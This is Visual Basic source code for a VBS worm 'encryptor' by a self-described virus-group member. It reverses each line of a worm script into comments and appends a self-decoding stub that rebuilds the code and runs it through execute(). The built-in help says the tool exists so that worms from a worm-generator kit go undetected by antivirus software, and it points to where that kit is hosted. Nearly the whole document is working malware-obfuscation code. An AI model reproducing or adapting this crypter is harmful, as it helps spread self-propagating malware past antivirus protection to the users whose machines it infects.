Private Sub Command1_Click()
On Error GoTo Georgia

If Text1.Text = "" Or Text2.Text = "" Then
MsgBox "Fill all fields on Form...", 16, "Alert!"
Exit Sub
End If

Georgia:
If Err.Number = 53 Or Err.Number = 76 Then
MsgBox "Path or File not found", 16, "AlErt!"
Exit Sub
End If

If Err.Number = 62 Then
MsgBox "READ Help before continue...otherwise U won't...", 16, "Stoped by KaGra"
Exit Sub
End If

Set fso = CreateObject("scripting.filesystemobject")
Set r = fso.opentextfile(Text1.Text, 1)
Set n = fso.createtextfile(Text2.Text, True)
b = 0
Do While buff <> "'kagra"

buff = ""
buff = r.readline

If buff = "" Then
GoTo Drop
End If

comment = Mid(buff, 1, 1)
If comment = "'" Then
GoTo Drop
End If

noexecfunc = Mid(buff, 1, 7)
If noexecfunc = "execute" Then
MsgBox "READ Help before continue...otherwise U won't...", 16, "Stoped by KaGra"
n.Close
r.Close
fso.deletefile (Text2.Text)
Exit Sub
End If

b = b + 1
a = 1
Do
buff1 = Mid(buff, a, 1)
buff2 = buff1 & buff2
a = a + 1
Loop While a <> Len(buff) + 1
buff3 = "'" & buff2
n.writeline buff3
Drop:
buff1 = ""
buff2 = ""
buff3 = ""
Loop

r.Close
n.writeline "On error resume next"
n.writeline "Set fso = CreateObject(""scripting.filesystemobject"")"
n.writeline "Set r = fso.opentextfile(wscript.scriptfullname)"
n.writeline "aa=" & b
n.writeline "Do"
n.writeline "buffer = r.readline"
n.writeline "buffer2 = strreverse(buffer)"
n.writeline "buffer3 = Mid(buffer2, 1, Len(buffer2) - 1)"
n.writeline "all=all &" & """:""" & "& buffer3"
n.writeline "aa = aa - 1"
n.writeline "Loop While aa <> 0"
n.writeline "Georgia = Mid(All, 2, Len(All) - 1)"
n.writeline "execute (Georgia)"

n.Close
MsgBox "Worm EncRypted--->>MuMie mumie,KaGra Gives Livin' to The Dead...", 64, "@@@It's a Resident Evil Tool@@@"
End Sub

Private Sub Command2_Click()
MsgBox "This program encrypts vbs Worms created by VbsWorm packed Generator ver 2b ,modified by KaGra (Me) so that none AV find this tool till 13/11/2002 as malware,whitch is at URL: www.angelfire.com/retro/zone2 (the wormgen).The new Vbs output file is of cource independant,and by double clicking it functions just like the input file,but is encrypted.You HAVE to do the following things in order for this encryptor to work :First, add the comment 'kagra after last line of the file and second remove all execute() functions (if any) from the input vbs file,or do not use the encryption option from the menu in the Worm kit.If U don't make those two things,the encryptor Won't work.If U also do those things,this vbs encryptor Works just fine for Every Vbs File.End of Help(mail me at :roallercoaster1@yahoo.com)---->>>KaGra writer,Brigada ocho virii member,Greece...", 64, "Usage Instructions"
End Sub

Private Sub Command3_Click()
End
End Sub


